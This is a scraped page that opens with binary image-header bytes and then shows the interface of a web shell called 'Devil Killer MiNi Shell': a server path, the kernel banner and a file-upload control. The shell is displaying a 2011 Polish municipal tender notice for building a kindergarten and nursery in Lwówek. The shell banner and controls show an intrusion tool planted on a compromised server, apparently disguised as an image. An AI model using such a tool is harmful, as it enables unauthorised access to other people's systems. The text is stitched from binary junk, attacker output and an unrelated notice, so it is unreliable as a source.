JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111229/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20111229/347707-N-2011.html

<p class="kh_header"><b>Lwówek: Budowa budynku przedszkola wraz z oddziałami żłobka w Lwówku.
Inwestycja planowana na rok 2012 i 2013</b><br>
<b>Numer ogłoszenia: 347707 - 2011; data zamieszczenia: 29.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Lwówek , ul. Ratuszowa 2, 64-310 Lwówek, woj. wielkopolskie, tel. 061 4414024, faks 061 4414212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.lwowek.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa budynku przedszkola wraz z oddziałami żłobka w Lwówku.
Inwestycja planowana na rok 2012 i 2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 2. Opis przedmiotu zamówienia: 
1) Przedmiotem zamówienia jest budowa kompletnego budynku przedszkola wraz z oddziałami żłobka w Lwówku, wraz z dostawą wyposażenia i urządzeń niezbędnych do funkcjonowania przedmiotowego obiektu zgodnie ze swoim przeznaczeniem.                                                                                           Przedmiot zamówienia określa dokumentacja projektowa - projekt budowlany i branżowe projekty wykonawcze (udostępnione na stronie internetowej Zamawiającego) wykonane przez Pracownię projektową architektoniczno - budowlaną z mgr. inż. arch. Przemysław Sturgólewski z Kalisza, dla planowanej budowy Zamawiający otrzymał decyzję zatwierdzającą projekt budowlany i udzielającą pozwolenia na budowę budynku przedszkola wraz z wewnętrzną instalacją gazową, wydaną przez Starostwo Powiatowe w Nowym Tomyślu, decyzja nr 888/2008 z dnia 09.12.2008r., oraz decyzję zamienną nr 857/2011 z dnia 13.12.20112r., (decyzja zamienna obejmuje zmianę projektu zagospodarowania działki, a w tym zwiększenie powierzchni zabudowy, zmianę układu sieci uzbrojenia terenu, oraz zmianę układu funkcjonalnego pomieszczeń, a w tym zmianę części pomieszczeń przedszkolnych na pomieszczenia pod działalność żłobka). 

Zamawiający w pierwszym etapie swoich działań planował budowę przedszkola 6-cio oddziałowego, dla którego sporządzono projekt budowlany i uzyskano pozwolenie na budowę w 2008 roku, lecz uwarunkowania społeczne wymusiły zmianę planów i na tę okoliczność sporządzono dokumentację zamienną obejmującą budowę przedszkola 4-o oddziałowego wraz z częścią przeznaczoną pod działalność żłobka, w oparciu o wprowadzone zmiany uzyskano decyzję zamienną.  

2) Parametry techniczne, zestawienie powierzchni i kubatury budynku wraz z infrastrukturą komunikacyjną: 
Powierzchnia zabudowy - 805,3m2
Kubatura - 8080,26m3
Powierzchnia użytkowa - 1691,89m2
Długość budynku - 30,00m
Szerokość budynku - 27,55m + przybudówka 3,40m
Wysokość budynku - 10,01m - zróżnicowana (patrz przekroje)
Ilość kondygnacji - 3
Ilość klatek schodowych - 2
Powierzchnia przewidziana pod drogi i parkingi - 540,00m2
Powierzchnia przewidziana pod chodniki - 216,00m2
Powierzchnia przewidziana pod rampy i zjazdy dla wózków - 41,00m2

3) Szczegółowy zakres robót budowlanych określa projekt budowlany i budowlano - wykonawcze projekty branżowe oraz specyfikacje techniczne wykonania i odbioru robót. Teren inwestycji zlokalizowany jest w Lwówku przy ul. Świtalskiego, na działkach  nr ewid. 817/2, 817/3, 818/11, 818/12, 819/37, 819/38, 819/39, 819/40, które są własnością Gminy Lwówek.                                                                
Uwaga: Zamawiający uznaje, że przedstawione w załączeniu dokumentacji przetargowej przedmiary robót do wykonania mają jedynie znaczenie pomocnicze i stanowią jedynie podstawę informacyjną dla Wykonawcy. Roboty nie ujęte w przedmiarach robót do wykonania, a występujące w projektach budowlano - wykonawczych nie są robotami dodatkowymi.

4) Projektowana budowa wykorzystuje w swoim zakresie istniejące ławy fundamentowe i istniejące ściany piwnic wykonane pod koniec lat 90-tych, z uwzględnieniem częściowych rozbiórek elementów, które uległy uszkodzeniu oraz tych, które nie będą wykorzystane przy aktualnej koncepcji zabudowy. 

5) Wizja lokalna terenu budowy. Zaleca się, aby wykonawca dokonał wizji lokalnej terenu budowy i jego otoczenia, a także zdobył, na swoją własną odpowiedzialność i ryzyko, wszelkie dodatkowe informacje, które mogą być konieczne do przygotowania oferty oraz zawarcia umowy i wykonania zamówienia. Koszty dokonania wizji lokalnej terenu budowy poniesie wykonawca.

6) Jeżeli w dokumentacji technicznej (projekcie budowlanym lub projektach wykonawczych lub w specyfikacjach technicznych wykonania i odbioru robót) do wykonania przedmiotowego zamówienia zostały przedstawione wskazania techniczne, materiały, urządzenia lub osprzęt  wskazujące na konkretnego producenta, należy traktować je jako przykładowe, ze względu na zasady ustawy Prawo zamówień publicznych art. 29. 
Oznacza to, że Wykonawcy mogą zaproponować inne rozwiązania,  materiały, urządzenia lub osprzęt  z zachowaniem odpowiednich, równoważnych (tj. nie gorszych niż wskazane) parametrów technicznych dla osiągnięcia oczekiwanej funkcjonalności całego przedmiotu zamówienia, z zapewnieniem uzyskania przez Wykonawcę i na jego koszt wszelkich ewentualnych uzgodnień, sprawdzeń, badań i opinii na temat przyjętych przez siebie rozwiązań, materiałów, urządzeń i osprzętu w tym także w przypadku takiej  potrzeby zgody i akceptacji autorów dokumentacji projektowej (projektu budowlanego i projektów wykonawczych) oraz specyfikacji technicznych wykonania i odbioru robót.                 
Zamawiający dopuszcza możliwość zastosowania rozwiązań i materiałów (produktów) równoważnych do tych, jakie zostały wskazane w dokumentacjach technicznych, pod warunkiem, że będą one spełniały wszystkie obowiązujące normy i będą dopuszczone do obrotu na terenie UE (Unii Europejskiej) oraz będą posiadały parametry takie same lub zbliżone do tych, jakie zostały określone w dokumentacji technicznej.
Wszystkie wskazane znaki towarowe, nazwy producentów lub dystrybutorów zostały wskazane w celu właściwego (precyzyjnego) opisania przedmiotu zamówienia.

7) Roboty inne i prace towarzyszące przedmiotowi zamówienia:                                                                     1/ Wykonawca na swój koszt zabezpiecza teren budowy przed dostępem osób niepowołanych, na czas prowadzenia robót ustawiając odpowiednie znaki ostrzegawcze i informacyjne oraz zapewniając właściwe zabezpieczenie i oświetlenie terenu (jeżeli zachodzi taka potrzeba),                                                                  2/ Wykonawca na swój koszt zabezpiecza obsługę geodezyjną i wykona inwentaryzację geodezyjną powykonawczą (3egz.),                                                                                                                                                                            3/ Wykonawca pokryje ewentualne koszty napraw uszkodzonych urządzeń, wyrządzonych szkód  podczas wykonywania robót w obrębie terenu budowy i dokona stosownych napraw wymaganych przez administratorów uszkodzonych obiektów,                                                                                                                             4/ Wykonawca pokryje koszty doprowadzenia i zużycia mediów do placu budowy, oraz wykona na swój koszt wszelkie niezbędne sprawdzenia, badania i próby łącznie z mediami w celu wykazania poprawnego wykonania przedmiotu zamówienia,                                                                                                                           5/ przed przystąpieniem do robót Wykonawca zawiadomi zainteresowane strony o zamierzonym terminie ich rozpoczęcia. 
8) Informacje finansowe związane z przedmiotem zamówienia: 1/ Zamawiający informuje potencjalnych Wykonawców, że na obecną chwilę w budżecie Gminy Lwówek na 2012r. posiada zabezpieczone środki finansowe w wysokości 1 500 000,00zł (Zamawiający przewiduje zwiększenie tych środków, przy akceptacji Rady Miejskiej Lwówka, lecz może to nastąpić dopiero w 2012r.)  w przypadku, kiedy na dzień podpisania umowy nie będzie znana ewentualna wielkość zwiększenia środków przeznaczonych na sfinansowanie zamówienia w 2012r. Zamawiający będzie zobowiązany podpisać umowę (zaciągnąć zobowiązanie) tylko do wysokości środków zabezpieczonych na to zadanie, czyli do wysokości 1 500 000,00zł z możliwością aneksowania umowy (zobowiązania) do wysokości środków ewentualnego zwiększenia.   
Po uchwaleniu budżetu na rok 2013 Zamawiający sporządzi aneks zwiększający wartość zamówienia na budowę budynku przedszkola wraz z oddziałami żłobka w Lwówku do wysokości środków przeznaczonych na to zamówienie.                                       
2/ Wykonawca sporządzi niezwłocznie przed podpisaniem umowy harmonogram rzeczowo-finansowy robót zawierający podział realizacji przedmiotu zamówienia na poszczególne etapy robót i terminy ich realizacji wraz z wynagrodzeniem za te etapy, pierwsza płatność przewidziana w harmonogramie rzeczowo- finansowym może nastąpić po wykonaniu co najmniej 10% prac z całego zamówienia. Harmonogram rzeczowo-finansowy wymaga bezwzględnej akceptacji Zamawiającego, po jej udzieleniu będzie załącznikiem do podpisywanej umowy.                                                                                                                                            3/ Zamawiający zastrzega sobie prawo do możliwości zmniejszenia zakresu robót z harmonogramu rzeczowo-finansowego przedmiotu zamówienia do wysokości środków zabezpieczonych na to zadanie w budżecie gminy Lwówek na 2012r. (jeżeli zajdzie taka potrzeba). Jeżeli zaistnieje taka okoliczność, Wykonawca będzie zobowiązany do realizacji zamówienia zgodnie ze zmienionym harmonogramem rzeczowo-finansowym.

9) Inne informacje związane z przedmiotem zamówienia:   
1/ Zamawiający informuje potencjalnych Wykonawców, że wyłącza z zamówienia podstawowego 
jakim jest budowa budynku przedszkola wraz z oddziałami żłobka w Lwówku wyposażenie przedszkola z oddziałami żłobka w meble,                                                                                      Wykonawcy w swoich ofertach nie wyceniają wyposażenia w meble.
2/ przedmiot zamówienia należy wykonać zgodnie ze sztuką budowlaną i zasadami współczesnej wiedzy technicznej, przy przestrzeganiu Polskich Norm przenoszących normy europejskie PN-EN (normy zharmonizowane),  polskich aprobat technicznych i polskich specyfikacji technicznych oraz przepisów  bhp i p.poż.,                                                                                                                                            3/ Wykonawca zapewnia materiały i urządzenia niezbędne do wykonania przedmiotu zamówienia                (z uwzględnieniem prawa opcji obejmującego ewentualne zamienniki wskazane przez Wykonawcę projektu technicznego w opisach technicznych dokumentacji projektowej, lub specyfikacjach technicznych wykonania i odbioru robót), posiadające aktualne atesty i certyfikaty pozwalające na stosowanie w budownictwie, transport materiałów na plac budowy oraz dostarczenie i eksploatacja maszyn, urządzeń obciąża Wykonawcę,    
4/ Wykonawca w trakcie wykonywania robot ponosi odpowiedzialność za bezpieczeństwo swoich pracowników, własne oraz innych osób znajdujących się w obrębie przekazanego terenu budowy z tytułu prowadzonych robót, jak i poruszającego się sprzętu transportowego, oraz na swój koszt zabezpiecza urządzenia, sprzęt i materiały pozostawione na placu budowy,                                                                                                                                                  5/ Wykonawca zapewnia we własnym zakresie wywóz i utylizację odpadów, w tym odpadów budowlanych wytworzonych na placu budowy, a po zakończeniu robót teren uporządkuje i zagospodaruje,                                                                                                                                              6/ obiekt przedszkola wraz z oddziałami żłobka wymaga uzyskania przez inwestora przed przystąpieniem do użytkowania ostatecznej decyzji o pozwoleniu na użytkowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających 

1) Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających  stanowiących nie więcej niż 20% wartości zamówienia podstawowego. 
1/ Zamawiający przewiduje możliwość udzielenia zamówienia uzupełniającego dla dostaw wyposażenia przedszkola z oddziałami żłobka w meble (Zamawiający może udzielić zamówienia uzupełniającego dotychczasowemu Wykonawcy polegającego na rozszerzeniu dostaw o wyposażenie przedszkola z oddziałami żłobka w meble, lub przeprowadzić oddzielne postępowanie przetargowe obejmujące wyłącznie dostawę samego wyposażenia w meble),
2/ Wykonawca wykona zamówienie uzupełniające  jedynie na wyraźne polecenie Zamawiającego,                na podstawie dodatkowego zamówienia - dodatkowej umowy realizowanej zgodnie z art. 67 ust. 1 pkt. 7) ustawy Pzp, dla których zostanie sporządzona przez Wykonawcę oddzielna wycena  i złożona oferta, dla faktycznie przewidzianych do wykonania ilości  dostaw zgodnie ze specyfikacją dostarczoną przez Zamawiającego, sporządzoną w oparciu o założenia z projektu budowlanego.

2) Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających  stanowiących nie więcej niż 50% wartości zamówienia podstawowego. 
1/ Jeżeli w trakcie realizacji umowy i wykonywania robót wystąpią zmiany rozwiązań technicznych równorzędne, lub polepszające funkcjonalność projektowanej zabudowy, od tego jakie przewiduje projekt  budowlany i projekty wykonawcze, a wartość najkorzystniejszej wybranej oferty będzie niższa, niż wartość środków zabezpieczonych w budżecie na to zadanie, a zamówienie będzie polegało na powtórzeniu tego samego rodzaju zamówień,  
2/ Wykonawca wykona zamówienie uzupełniające  jedynie na wyraźne polecenie Zamawiającego,                na podstawie dodatkowej umowy realizowanej zgodnie z art. 67 ust. 1 pkt. 6) ustawy Pzp, dla której zostanie sporządzona przez Wykonawcę wycena w oparciu o obowiązujące katalogi nakładów rzeczowych i złożoną ofertę, zgodnie z tabelą czynników cenotwórczych, jednakowych jak przyjęte w złożonej ofercie podstawowej i faktycznie przewidzianych do wykonania ilości robót (potwierdzonych przez inspektora nadzoru inwestorskiego).                                                                                                            

3) Zamawiający dopuszcza możliwość udzielenia zamówień dodatkowych  nieobjętych zamówieniem podstawowym  i nieprzekraczających łącznie 50% wartości zamówienia podstawowego. 
1/ Jeżeli w trakcie realizacji umowy wystąpią roboty dodatkowe niezawinione przez Wykonawcę, które nie dają się przewidzieć przed rozpoczęciem robót, na etapie projektowania i planowania inwestycji i  wymagają dodatkowego wynagrodzenia, jeżeli z przyczyn technicznych lub gospodarczych oddzielenie zamówienia dodatkowego od zamówienia podstawowego wymagałoby poniesienia niewspółmiernie wysokich kosztów, lub
wykonanie zamówienia podstawowego jest uzależnione od wykonania zamówienia dodatkowego,                                                                       
2/ Wykonawca wykona zamówienie dodatkowe  jedynie na wyraźne polecenie Zamawiającego,                na podstawie dodatkowej umowy realizowanej zgodnie z art. 67 ust. 1 pkt. 5) ustawy Pzp, dla którego zostanie sporządzona przez Wykonawcę wycena w oparciu o obowiązujące katalogi nakładów rzeczowych i złożoną ofertę, zgodnie z tabelą czynników cenotwórczych, jednakowych jak przyjęte w złożonej ofercie podstawowej i faktycznie przewidzianych do wykonania ilości robót (zgodnie z protokołem konieczności wykonania robot dodatkowych potwierdzonym przez inspektora nadzoru inwestorskiego).</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.41.00-1, 45.20.00.00-9, 45.21.00.00-2, 45.21.40.00-0, 45.23.13.00-8, 45.33.00.00-9, 45.23.21.30-2, 45.23.24.60-4, 45.33.00.00-9, 45.33.24.00-7, 45.33.22.00-5, 45.33.12.10-1, 45.33.30.00-0, 45.33.11.10-0, 45.33.11.00-7, 45.33.00.00-9, 45.32.10.00-3, 45.31.12.00-2, 45.34.20.00-2, 45.23.32.20-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.06.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium                                                                                                                   2. Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 100 000,00zł,                                               słownie: sto tysięcy złotych.                                                                                                                                                                        3. Wykonawca wnosi wadium w wybranej przez siebie, wymienionej poniżej, formie:                                         1) w pieniądzu, przelewem na rachunek bankowy  95 1020 4144 0000 6702 0007 0250  w PKO BP O/Nowy Tomyśl, z adnotacją - wadium - (nazwa zadania),                                                                                                                                                                   2) w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym, że zobowiązanie kasy jest zobowiązaniem pieniężnym,                                                                                         3) w gwarancjach bankowych,                                                                                                                                             4) w gwarancjach ubezpieczeniowych                                                                                                                   5) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275), przed upływem terminu do składania ofert (tj. do dnia 23.01.2012r.), sposób przekazania: oryginał dokonania zapłaty wadium należy dołączyć do składanej oferty.                                                             4. Za termin wniesienia wadium w formie przelewu pieniężnego przyjmuje się termin uznania na rachunku zamawiającego, oznacza to, że przed terminem składania ofert na koncie zamawiającego muszą się znaleźć pieniądze przelane tytułem wadium.                                                                                                                                                   5. W zakresie wadium obowiązują uregulowania Prawa zamówień publicznych zawarte w art. 45 i 46.
6. W przypadku niezabezpieczeni oferty jedną z określonych w niniejszej specyfikacji form wadium wykonawca zostanie wykluczony z udziału w postępowaniu, a jego oferta podlegać będzie odrzuceniu.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia nie wymaga posiadania specjalnych uprawnień, za spełnienie warunku posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Zamawiający uzna złożenie przez Wykonawcę oświadczenia z art. 22 ust 1 ustawy Pzp.  
Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.
Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia przedstawione wyżej warunki.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek spełnią wykonawcy, którzy : 
w okresie ostatnich pięciu lat przed wszczęciem postępowania (a jeżeli okres działalności jest krótszy - to w tym okresie) wykonali należycie minimum jedną robotę budowlaną odpowiadającą swoim rodzajem i zakresem robotom stanowiącym przedmiot zamówienia;
1/ wykonali minimum jedno zamówienie polegające na budowie kompletnego budynku użyteczności publicznej w pełnym zakresie,  oraz wykonali minimum jedno utwardzenie nawierzchni gruntowych kostką betonową, tj. wykonali;                                                                                                                       a)  roboty budowlano montażowe, roboty w zakresie instalacji wodno kanalizacyjnej, centralnego ogrzewania oraz instalacji elektrycznej, o jednostkowej kubaturze dla obiektu nie mniejszej niż kubatura obiektu przewidzianego do realizacji wynikająca z  przedmiotowego kontraktu  (przedmiotowej umowy wynikającej z postępowania) - kubatura nie mniejsza niż 8 000,00m3 dla jednego obiektu kubaturowego i posiadają dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone,
b)  roboty budowlane polegające na wykonaniu utwardzenia nawierzchni gruntowych przez ułożenie kostki betonowej w jednym miejscu na; drogach, miejscach parkingowych, chodnikach na powierzchni nie mniejszej niż powierzchnia wynikająca z przewidzianego do realizacji wynikająca z  przedmiotowego kontraktu  (przedmiotowej umowy wynikającej z postępowania) - powierzchnia nie mniejsza niż  750,00m2 dla jednego zamówienia i posiadają dokumenty potwierdzające, że roboty te zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
c) poszczególne roboty wymienione w wyżej mogą być wykonane w jednym zamówieniu lub w oddzielnych zamówieniach.      
                                                                                                                        
2/ Za budynek użyteczności publicznej Zamawiający uzna budynek przeznaczony do wykonywania funkcji administracji państwowej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, nauki, służby zdrowia, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym i wodnym, poczty i telekomunikacji lub inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji.   

3/ Wskazane jest aby dokumenty potwierdzające, że roboty wymienione w wykazie robót budowlanych zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone (np. referencje, listy polecające) zawierały co najmniej: 
a) wskazanie, że Wykonawca realizował roboty, których dokumenty dotyczą,
b) wskazanie Zamawiającego,
c) przedmiot / rodzaj wykonanych robót,
d) wartość wykonanych robót,
e) opinię stwierdzającą, że roboty wykonano zgodnie z zasadami sztuki budowlanej i zostały one prawidłowo ukończone lub opinię równoważną,
f) identyfikację oraz podpis osoby upoważnionej.
Konieczne jest, aby przedkładane dokumenty potwierdzające, że wykonane przez Wykonawców roboty zostały wykonane należycie, zawierały jednoznaczne i nie budzące wątpliwości potwierdzenie należytego wykonania i nie zawierały sprzecznych z wykazem informacji.

Ocena spełnienia warunków udziału w postępowaniu dokonywana będzie w oparciu o dokumenty złożone przez wykonawcę w niniejszym postępowaniu metodą warunku granicznego - spełnia/niespełna.
Z treści złożonych dokumentów musi wynikać jednoznacznie, iż Wykonawca spełnia przedstawione wyżej warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek spełnią wykonawcy, którzy: 
1/ wykażą że dysponują osobami zdolnymi do wykonania przedmiotowego zamówienia, bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz dołączą wykaz podwykonawców przewidzianych do wykonania przedmiotowego zamówienia z określeniem rodzaju powierzonej części zamówienia do 
wykonania  oraz wartości powierzonej im części zamówienia i udziału procentowego w zakresie realizacji przedsięwzięcia, 
2/ dysponują minimum jedną osobą (kierownikiem budowy) posiadającą uprawnienia budowlane w zakresie i specjalności objętej zamówieniem  - dla osób odpowiedzialnych za realizację robót, może to być jedna osoba, lub trzy niezależne,  posiadającą/e odpowiednie uprawnienia), o których mowa w art. 14 ust. 1 pkt 4 ustawy z dnia 7 lipca 1994 roku - Prawo budowlane (Dz. U. z 2010 roku, Nr 243, poz. 1623), dysponującą/ymi aktualnym potwierdzeniem  przynależności do Okręgowej Izby Inżynierów Budownictwa, i tak;
- do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej w zakresie konstrukcji budowlanych (dla kierownika budowy),                                                                                                                           - do kierowania robotami budowlanymi w specjalności instalacyjno - inżynieryjnej, w zakresie instalacji elektrycznych (dla kierownika robót),                                                                                                                                                          - do kierowania robotami budowlanymi w specjalności instalacyjno - inżynieryjnej w zakresie instalacji   sanitarnych (dla kierownika robót),                                                                                                                                                   
-  bądź przedstawią pisemne zobowiązania innych podmiotów do udostępnienia potencjału technicznego (kierownika budowy, kierowników robot), osób zdolnych i odpowiedzialnych  za realizację robót, przewidzianych do wykonania przedmiotowego zamówienia. 

